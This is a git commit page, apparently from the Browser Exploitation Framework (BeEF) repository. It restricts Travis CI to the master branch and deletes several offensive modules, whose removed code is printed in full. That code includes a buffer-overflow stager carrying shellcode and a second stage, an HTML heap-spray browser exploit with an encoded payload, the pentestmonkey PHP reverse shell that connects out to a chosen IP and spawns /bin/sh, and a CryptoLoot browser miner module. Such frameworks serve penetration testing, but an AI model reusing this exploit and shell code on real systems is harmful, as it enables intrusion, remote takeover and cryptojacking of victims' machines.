should make travis.ci only run on master
This commit is contained in:
Josh
@@ -10,6 +10,10 @@ notifications:
|
||||
- wade@bindshell.net
|
||||
on_success: always
|
||||
on_failure: always
|
||||
# safelist
|
||||
branches:
|
||||
only:
|
||||
- master
|
||||
addons:
|
||||
apt:
|
||||
packages:
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,76 +0,0 @@
|
||||
//
|
||||
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function () {
|
||||
var rhost = '<%= @rhost %>';
|
||||
var rport = '<%= @rport %>';
|
||||
var service_port = '<%= @service_port %>';
|
||||
var jmpesp = '<%= @jmpesp %>';
|
||||
|
||||
// BeEF Bind stager, listen on 4444
|
||||
var shellcode = '\xd9\xc2\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x6d\x38\x6c\x49\x63\x30\x53\x30\x63\x30\x73\x50\x6f\x79\x68\x65\x65\x61\x5a\x72\x65\x34\x4c\x4b\x31\x42\x76\x50\x6c\x4b\x43\x62\x34\x4c\x6e\x6b\x63\x62\x55\x44\x6e\x6b\x52\x52\x35\x78\x54\x4f\x4c\x77\x31\x5a\x67\x56\x55\x61\x6b\x4f\x64\x71\x59\x50\x4c\x6c\x65\x6c\x43\x51\x31\x6c\x74\x42\x56\x4c\x31\x30\x6b\x71\x7a\x6f\x44\x4d\x37\x71\x39\x57\x69\x72\x6a\x50\x32\x72\x56\x37\x4c\x4b\x53\x62\x32\x30\x4e\x6b\x47\x32\x77\x4c\x66\x61\x48\x50\x6e\x6b\x57\x30\x34\x38\x4c\x45\x6b\x70\x72\x54\x53\x7a\x37\x71\x68\x50\x72\x70\x4e\x6b\x70\x48\x32\x38\x4c\x4b\x46\x38\x45\x70\x53\x31\x59\x43\x7a\x43\x65\x6c\x62\x69\x6e\x6b\x75\x64\x4c\x4b\x47\x71\x48\x56\x75\x61\x6b\x4f\x36\x51\x4b\x70\x6e\x4c\x6f\x31\x7a\x6f\x74\x4d\x53\x31\x68\x47\x70\x38\x79\x70\x62\x55\x68\x74\x65\x53\x71\x6d\x78\x78\x67\x4b\x53\x4d\x57\x54\x30\x75\x48\x62\x50\x58\x6e\x6b\x56\x38\x55\x74\x53\x31\x5a\x73\x71\x76\x6e\x6b\x64\x4c\x72\x6b\x4e\x6b\x76\x38\x35\x4c\x35\x51\x49\x43\x4e\x6b\x37\x74\x4c\x4b\x55\x51\x6a\x70\x6b\x39\x71\x54\x37\x54\x65\x74\x63\x6b\x61\x4b\x30\x61\x53\x69\x63\x6a\x63\x61\x69\x6f\x4d\x30\x32\x78\x31\x4f\x30\x5a\x6c\x4b\x55\x42\x6a\x4b\x4d\x56\x73\x6d\x50\x68\x50\x33\x56\x52\x33\x30\x45\x50\x51\x78\x44\x37\x31\x63\x46\x52\x31\x4f\x70\x54\x62\x48\x70\x4c\x34\x37\x47\x56\x36\x67\x6b\x4f\x68\x55\x6f\x48\x4a\x30\x63\x31\x45\x50\x73\x30\x51\x39\x4f\x34\x36\x34\x52\x70\x42\x48\x75\x79\x4f\x70\x42\x4b\x67\x70\x59\x6f\x49\x45\x76\x30\x36\x30\x66\x30\x32\x70\x77\x30\x72\x70\x77\x30\x62\x70\x65\x38\x68\x6a\x36\x6f\x79\x4f\x6d\x30\x79\x6f\x5a\x75\x7a\x37\x45\x61\x69\x4b\x76\x33\x45\x38\x53\x32\x73\x30\x34\x51\x43\x6c\x6b\x39\x6a\x46\x31\x7a\x52\x30\x70\x56\x31\x47\x51\x78\x49\x52\x49\x4b\x56\x57\x51\x77\x4b\x4f\x58\x55\x76\x33\x31\x47\x42\x48\x48\x37\x78\x69\x34\x78\x49\x6f\x79\x6f\x79\x45\x32\x73\x51\x43\x72\x77\x72\x48\x63\x44\x48\x6c\x47\x4b\x6b\x51\x4b\x4f\x48\x55\x63\x67\x4c\x57\x63\x58\x33\x45\x72\x4e\x42\x6d\x43\x51\x39\x6f\x49\x45\x4f\x4b\x37\x70\x62\x30\x73\x30\x67\x70\x42\x4a\x77\x30\x76\x33\x61\x43\x31\x7a\x77\x70\x33\x58\x61\x48\x4f\x54\x53\x63\x4a\x45\x79\x6f\x78\x55\x6d\x59\x49\x56\x50\x6a\x57\x70\x43\x63\x70\x50\x72\x77\x43\x58\x55\x52\x6a\x79\x78\x48\x43\x6f\x4b\x4f\x5a\x75\x43\x67\x63\x58\x6f\x36\x4f\x66\x4e\x67\x56\x32\x59\x6f\x79\x45\x6d\x51\x47\x4e\x45\x33\x62\x4d\x72\x44\x45\x6d\x53\x44\x75\x53\x52\x66\x38\x6b\x48\x75\x6c\x43\x4a\x66\x36\x64\x6b\x4f\x69\x76\x41\x41';
|
||||
|
||||
var stage = '\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe\x18\x04\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x31\x36\x0d\x0a\x0d\x0a\x5e\xb9\x62\x00\x00\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14\x04\x00\x00\x57\x68\x86\x0b\x00\x00\x8d\xbe\x7a\x04\x00\x00\x57\x8d\x5c\x24\x70\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52\xff\xd5\xe9\x38\xfe\xff\xff';
|
||||
|
||||
var adjust = '\x81\xc4\x24\xfa\xff\xff';
|
||||
|
||||
log = function(data){
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
|
||||
beef.debug(data);
|
||||
};
|
||||
|
||||
sendpayload = function(payload, uri, timeout, logdata){
|
||||
var xhr = new XMLHttpRequest();
|
||||
// for WebKit-based browsers
|
||||
if (!XMLHttpRequest.prototype.sendAsBinary) {
|
||||
XMLHttpRequest.prototype.sendAsBinary = function (sData) {
|
||||
var nBytes = sData.length, ui8Data = new Uint8Array(nBytes);
|
||||
for (var nIdx = 0; nIdx < nBytes; nIdx++) {
|
||||
ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff;
|
||||
}
|
||||
/* send as ArrayBufferView...: */
|
||||
this.send(ui8Data);
|
||||
};
|
||||
}
|
||||
xhr.open("POST", uri, true);
|
||||
xhr.setRequestHeader("Content-Type", "text/plain");
|
||||
xhr.setRequestHeader('Accept','*/*');
|
||||
xhr.setRequestHeader("Accept-Language", "en");
|
||||
xhr.sendAsBinary(post_body);
|
||||
if (timeout>0) {
|
||||
setTimeout(function(){xhr.abort();log(logdata);}, timeout);
|
||||
} else {
|
||||
log(logdata);
|
||||
}
|
||||
};
|
||||
|
||||
var shellcode_chunk_1 = shellcode.slice(0,554);
|
||||
var shellcode_chunk_2 = shellcode.slice(554, shellcode.length);
|
||||
|
||||
function genJunk(c, length){
|
||||
var temp = "";
|
||||
for(var i=0;i<length;i++){
|
||||
temp += c;
|
||||
}
|
||||
return temp;
|
||||
}
|
||||
|
||||
var fill = genJunk("\x90", (1024 - shellcode_chunk_2.length));
|
||||
|
||||
// final shellcode stager
|
||||
var payload = shellcode_chunk_2 + fill + jmpesp + adjust + shellcode_chunk_1;
|
||||
var url = "http://"+rhost+":"+service_port+"/";
|
||||
var post_body = "@F506 " + payload + "@\r\n\r\n";
|
||||
|
||||
//send first stage
|
||||
sendpayload(post_body,url, 2000, "Delivered first stage");
|
||||
|
||||
var url = "http://"+rhost+":"+rport+"/";
|
||||
post_body = "cmd=" + stage;
|
||||
//send second stage
|
||||
setTimeout(function(){sendpayload(post_body,url, 0, "Delivered second stage");}, 5000);
|
||||
|
||||
});
|
||||
File diff suppressed because it is too large
Load Diff
@@ -2,75 +2,7 @@
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
var freeReady = false;
|
||||
|
||||
function getObject() {
|
||||
var obj = '';
|
||||
for (i=0; i < 11; i++) {
|
||||
if (i==1) {
|
||||
obj += unescape("%u7422%u77c3");
|
||||
}
|
||||
else if (i==2) {
|
||||
obj += unescape("%u0105%u1ec2");
|
||||
}
|
||||
else if (i==3) {
|
||||
obj += unescape("%u0101%u1ec2");
|
||||
}
|
||||
else {
|
||||
obj += unescape("%u534c%u4552");
|
||||
}
|
||||
}
|
||||
obj += "\u4545";
|
||||
return obj;
|
||||
}
|
||||
|
||||
function emptyAllocator(obj) {
|
||||
for (var i = 0; i < 40; i++)
|
||||
{
|
||||
var e = document.createElement('div');
|
||||
e.className = obj;
|
||||
}
|
||||
}
|
||||
|
||||
function spray(obj) {
|
||||
for (var i = 0; i < 50; i++)
|
||||
{
|
||||
var e = document.createElement('div');
|
||||
e.className = obj;
|
||||
document.appendChild(e);
|
||||
}
|
||||
}
|
||||
|
||||
function putPayload() {
|
||||
var p = unescape("%u5656%u474d%u715a%u5567%u4654%u5968%u4648%u4e64%u6444%u6168%u6978%u756e%u686b%u747a%u7a56%u586d%u4658%u706c%u524f%u4c66%u4e64%u7363%u4d45%u4746%u616a%u454d%u6f47%u7549%u6277%u4663%u5776%u7861%u7647%u7850%u7943%u5272%u7a57%u766b%u4756%u5072%u556f%u6972%u594b%u7857%u7141%u434f%u736a%u6573%u634a%u7946%u4279%u6c6b%u7243%u645a%u566e%u7661%u4358%u646e%u5957%u4657%u7557%u4754%u4b71%u7478%u4644%u5973%u664c%u5672%u6471%u5854%u5a69%u525a%u6d50%u476d%u6252%u596a%u6d52%u6743%u696b%u4a6e%u5067%u7151%u704a%u6a54%u7352%u6150%u6544%u5877%u5453%u7673%u4857%u7161%u6d7a%u7657%u5468%u6b74%u7873%u4665%u4a72%u594c%u496e%u706d%u6b72%u6e4a%u7371%u5a53%u5050%u5a64%u5857%u676c%u496e%u6b75%u0177%uc201%u011e%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u1a77%uc4fa%u7577%u6647%u6075%uc3b8%u7977%ufffe%u18ff%uc1be%u5177%u32cb%u2c53%uc236%ubb77%uc5d9%u7177%uc2e0%u1377%uc50d%uc077%uffff%ubcff%uc58f%u1877%uc1be%u7c77%u25fa%ubc4e%uc58f%u1577%uc3ee%u1577%uc3ee%uef77%uc3ee%ubb77%uc5d9%u8c77%uc2a8%u9277%uc39f%u8477%uc3a1%ucc77%uc2aa%u6077%uc3b8%u2077%uc111%uf977%uc12d%u5977%uc354%u8177%u80c4%ufec7%udaff%ubfda%u2196%u3b1d%u74d9%uf424%u295d%ub1c9%u315a%u197d%uc583%u0304%u157d%ud474%u9a79%u1760%udc82%ud713%u578a%u5933%u574e%ua6cb%u64b0%ud0c3%u954f%u8313%u70c6%u9122%uf1bd%u2516%u54b5%uce9a%u4c9b%ua229%u6233%u099a%u4d62%ubc1b%u01aa%udedf%u5856%u0133%u9366%u4046%uceaf%u10a8%u8478%u851a%ud80d%ua4a6%u56c1%ude96%ua864%u5562%uf966%ue2da%ue120%uac51%u1090%uaeb6%u5bed%u05b3%u5d85%u5415%u6c66%u3b59%u4059%u4554%u679d%u3086%u9bd5%u433b%ue12e%uc6e7%u41b3%u706c%u7310%ue7a1%u7fd3%u630e%u63bb%ua091%u98b7%u471a%u2918%u6c58%u71bc%u0d3b%udfe5%u32ea%ub8f5%u9753%u2a7d%ua180%u23df%u9c65%ub3df%u97e1%u81ac%u03ae%uaa3b%u8a27%ucdbc%u6a12%u3052%u8b9c%uf77a%udbc8%ude14%ub070%udfe4%u17a5%u4fb5%ud815%u3065%ub0c5%ubf6f%ua03a%u158f%ue64d%u4d41%u811e%u71a3%u0db1%u972d%ubddb%u0f7b%u7c73%u9858%u7fe4%ub48a%u17bd%ud282%u1779%uf113%ub42a%u92bb%ud6b8%u827f%uf2bf%ucdd7%u95f8%ua3a2%u074b%ue9b2%ua43b%u7621%ua3bb%u2159%ue4ec%u38ac%u1978%u9296%ue09e%udc4e%u3f1a%ue3b3%ub2a3%uc78f%u0ab3%u4c0f%uc2e7%u1a46%ua551%uec30%u7f0b%ua6ee%u06db%u78dc%u069d%u0f09%ub641%u56e4%u777e%u5f61%u6507%ua011%u2dd2%ueb21%u077e%ub2aa%u15eb%u44b7%u5ac6%uc6ce%u22e2%ud635%u2787%u5071%u5a74%u35ea%uc97a%u1c0b");
|
||||
var block = unescape("%u534c%u4552");
|
||||
while (block.length < 0x80000) block += block;
|
||||
block = p + block.substring(0, (0x80000-p.length-6)/2);
|
||||
|
||||
for (var i = 0; i < 0x300; i++)
|
||||
{
|
||||
var e = document.createElement('div');
|
||||
e.className = block;
|
||||
document.appendChild(e);
|
||||
}
|
||||
}
|
||||
|
||||
function trigger() {
|
||||
if (freeReady) {
|
||||
var obj = getObject();
|
||||
emptyAllocator(obj);
|
||||
document.write("U");
|
||||
spray(obj);
|
||||
putPayload();
|
||||
}
|
||||
}
|
||||
|
||||
window.onload = function() {
|
||||
document.body.contentEditable = 'true';
|
||||
document.execCommand('InsertInputPassword');
|
||||
document.body.innerHTML = 'j';
|
||||
freeReady = true;
|
||||
}
|
||||
|
||||
</script>
|
||||
</head>
|
||||
<body onbeforeeditfocus="trigger()">
|
||||
|
||||
@@ -1,204 +0,0 @@
|
||||
<?php
|
||||
// php-reverse-shell - A Reverse Shell implementation in PHP
|
||||
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
|
||||
//
|
||||
// This tool may be used for legal purposes only. Users take full responsibility
|
||||
// for any actions performed using this tool. The author accepts no liability
|
||||
// for damage caused by this tool. If these terms are not acceptable to you, then
|
||||
// do not use this tool.
|
||||
//
|
||||
// In all other respects the GPL version 2 applies:
|
||||
//
|
||||
// This program is free software; you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License version 2 as
|
||||
// published by the Free Software Foundation.
|
||||
//
|
||||
// This program is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
//
|
||||
// You should have received a copy of the GNU General Public License along
|
||||
// with this program; if not, write to the Free Software Foundation, Inc.,
|
||||
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||
//
|
||||
// This tool may be used for legal purposes only. Users take full responsibility
|
||||
// for any actions performed using this tool. If these terms are not acceptable to
|
||||
// you, then do not use this tool.
|
||||
//
|
||||
// You are encouraged to send comments, improvements or suggestions to
|
||||
// me at pentestmonkey@pentestmonkey.net
|
||||
//
|
||||
// Description
|
||||
// -----------
|
||||
// This script will make an outbound TCP connection to a hardcoded IP and port.
|
||||
// The recipient will be given a shell running as the current user (apache normally).
|
||||
//
|
||||
// Limitations
|
||||
// -----------
|
||||
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
|
||||
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
|
||||
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
|
||||
//
|
||||
// Usage
|
||||
// -----
|
||||
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
|
||||
//
|
||||
// Modified version
|
||||
// ----------------
|
||||
// This file has been customized to pass ip address and port dynamically with permission of the original author
|
||||
// See http://beefproject.com
|
||||
|
||||
set_time_limit (0);
|
||||
$VERSION = "1.0";
|
||||
$ip = $_GET["ip"]; //retrieve ip address to connect back to via HTTP GET
|
||||
if (!$ip) {
|
||||
$ip = '127.0.0.1'; // or set static ip address
|
||||
}
|
||||
$port = $_GET["port"]; //retrieve port to connect back to via HTTP GET
|
||||
if (!$port) {
|
||||
$port = 1234; // or define port here
|
||||
}
|
||||
|
||||
$chunk_size = 1400;
|
||||
$write_a = null;
|
||||
$error_a = null;
|
||||
$shell = 'uname -a; w; id; /bin/sh -i';
|
||||
$daemon = 0;
|
||||
$debug = 0;
|
||||
|
||||
//
|
||||
// Daemonise ourself if possible to avoid zombies later
|
||||
//
|
||||
|
||||
// pcntl_fork is hardly ever available, but will allow us to daemonise
|
||||
// our php process and avoid zombies. Worth a try...
|
||||
if (function_exists('pcntl_fork')) {
|
||||
// Fork and have the parent process exit
|
||||
$pid = pcntl_fork();
|
||||
|
||||
if ($pid == -1) {
|
||||
printit("ERROR: Can't fork");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ($pid) {
|
||||
exit(0); // Parent exits
|
||||
}
|
||||
|
||||
// Make the current process a session leader
|
||||
// Will only succeed if we forked
|
||||
if (posix_setsid() == -1) {
|
||||
printit("Error: Can't setsid()");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
$daemon = 1;
|
||||
} else {
|
||||
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
||||
}
|
||||
|
||||
// Change to a safe directory
|
||||
chdir("/");
|
||||
|
||||
// Remove any umask we inherited
|
||||
umask(0);
|
||||
|
||||
//
|
||||
// Do the reverse shell...
|
||||
//
|
||||
|
||||
// Open reverse connection
|
||||
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
|
||||
if (!$sock) {
|
||||
printit("$errstr ($errno)");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Spawn shell process
|
||||
$descriptorspec = array(
|
||||
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
||||
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
||||
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
||||
);
|
||||
|
||||
$process = proc_open($shell, $descriptorspec, $pipes);
|
||||
|
||||
if (!is_resource($process)) {
|
||||
printit("ERROR: Can't spawn shell");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Set everything to non-blocking
|
||||
// Reason: Occsionally reads will block, even though stream_select tells us they won't
|
||||
stream_set_blocking($pipes[0], 0);
|
||||
stream_set_blocking($pipes[1], 0);
|
||||
stream_set_blocking($pipes[2], 0);
|
||||
stream_set_blocking($sock, 0);
|
||||
|
||||
printit("Successfully opened reverse shell to $ip:$port");
|
||||
|
||||
while (1) {
|
||||
// Check for end of TCP connection
|
||||
if (feof($sock)) {
|
||||
printit("ERROR: Shell connection terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
// Check for end of STDOUT
|
||||
if (feof($pipes[1])) {
|
||||
printit("ERROR: Shell process terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
// Wait until a command is end down $sock, or some
|
||||
// command output is available on STDOUT or STDERR
|
||||
$read_a = array($sock, $pipes[1], $pipes[2]);
|
||||
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||||
|
||||
// If we can read from the TCP socket, send
|
||||
// data to process's STDIN
|
||||
if (in_array($sock, $read_a)) {
|
||||
if ($debug) printit("SOCK READ");
|
||||
$input = fread($sock, $chunk_size);
|
||||
if ($debug) printit("SOCK: $input");
|
||||
fwrite($pipes[0], $input);
|
||||
}
|
||||
|
||||
// If we can read from the process's STDOUT
|
||||
// send data down tcp connection
|
||||
if (in_array($pipes[1], $read_a)) {
|
||||
if ($debug) printit("STDOUT READ");
|
||||
$input = fread($pipes[1], $chunk_size);
|
||||
if ($debug) printit("STDOUT: $input");
|
||||
fwrite($sock, $input);
|
||||
}
|
||||
|
||||
// If we can read from the process's STDERR
|
||||
// send data down tcp connection
|
||||
if (in_array($pipes[2], $read_a)) {
|
||||
if ($debug) printit("STDERR READ");
|
||||
$input = fread($pipes[2], $chunk_size);
|
||||
if ($debug) printit("STDERR: $input");
|
||||
fwrite($sock, $input);
|
||||
}
|
||||
}
|
||||
|
||||
fclose($sock);
|
||||
fclose($pipes[0]);
|
||||
fclose($pipes[1]);
|
||||
fclose($pipes[2]);
|
||||
proc_close($process);
|
||||
|
||||
// Like print, but does nothing if we've daemonised ourself
|
||||
// (I can't figure out how to redirect STDOUT like a proper daemon)
|
||||
function printit ($string) {
|
||||
if (!$daemon) {
|
||||
print "$string\n";
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
||||
|
||||
|
||||
|
||||
@@ -1,79 +0,0 @@
|
||||
//
|
||||
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
// Crypto-Loot integration, Zaur Molotnikov, 2017
|
||||
// Only for the use for test purposes!
|
||||
// Inspired by coinhive integration (copied and modified)
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var comm_url = '<%= @command_url %>';
|
||||
var comm_id = <%= @command_id %>;
|
||||
var report_interval = +(<%= @report_interval %>) * 1000; // to miliseconds
|
||||
|
||||
if (!beef.browser.hasWebSocket()) {
|
||||
beef.debug('[CryptoLoot] Error: browser does not support WebSockets');
|
||||
beef.net.send(comm_url, comm_id, "error=unsupported browser - does not support WebSockets", beef.are.status_error());
|
||||
return;
|
||||
}
|
||||
|
||||
if (!beef.browser.hasWebWorker()) {
|
||||
beef.debug('[CryptoLoot] Error: browser does not support WebWorkers');
|
||||
beef.net.send(comm_url, comm_id, "error=unsupported browser - does not support WebWorkers", beef.are.status_error());
|
||||
return;
|
||||
}
|
||||
|
||||
beef.debug("[CryptoLoot] Loading library...");
|
||||
beef.net.send(comm_url, comm_id, "[CryptoLoot] Loading library...");
|
||||
beef.dom.loadScript('https://crypto-loot.com/lib/miner.min.js');
|
||||
|
||||
try {
|
||||
setTimeout("mine('<%= @public_token %>')", 10000);
|
||||
} catch(e) {
|
||||
beef.debug("[CryptoLoot] Error loading miner: " + e.message);
|
||||
beef.net.send(comm_url, comm_id, 'error=' + e.message, beef.are.status_error());
|
||||
return;
|
||||
}
|
||||
|
||||
mine = function(token) {
|
||||
beef.debug("[CryptoLoot] Starting the miner...");
|
||||
beef.net.send(comm_url, comm_id, 'result=Starting the miner...');
|
||||
|
||||
try {
|
||||
var miner = new CryptoLoot.Anonymous(token);
|
||||
miner.start();
|
||||
} catch(e) {
|
||||
beef.debug("[CryptoLoot] Error starting miner: " + e.message);
|
||||
beef.net.send(comm_url, comm_id, 'error=' + e.message, beef.are.status_error());
|
||||
return;
|
||||
}
|
||||
|
||||
beef.debug("[CryptoLoot] setting triggers");
|
||||
|
||||
miner.on('found', function() {
|
||||
beef.debug("[CryptoLoot] Hash found");
|
||||
});
|
||||
beef.debug("[CryptoLoot] 'found' trigger set");
|
||||
|
||||
miner.on('accepted', function() {
|
||||
beef.debug("[CryptoLoot] Hash accepted by the pool");
|
||||
});
|
||||
beef.debug("[CryptoLoot] 'accepted' trigger set");
|
||||
|
||||
|
||||
setInterval(function() {
|
||||
beef.debug("[CryptoLoot] Miner progress:");
|
||||
beef.net.send(comm_url, comm_id, "[CryptoLoot] Miner progress:");
|
||||
if (miner.isRunning()) {
|
||||
var hashesPerSecond = miner.getHashesPerSecond();
|
||||
var totalHashes = miner.getTotalHashes();
|
||||
var acceptedHashes = miner.getAcceptedHashes();
|
||||
beef.debug("[CryptoLoot] Total Hashes: " + totalHashes + " -- Accepted Hashes: " + acceptedHashes + " -- Hashes/Second: " + hashesPerSecond);
|
||||
beef.net.send(comm_url, comm_id, "[CryptoLoot] Total Hashes: " + totalHashes + " -- Accepted Hashes: " + acceptedHashes + " -- Hashes/Second: " + hashesPerSecond);
|
||||
}
|
||||
}, report_interval)
|
||||
|
||||
}
|
||||
});
|
||||
Reference in New Issue
Block a user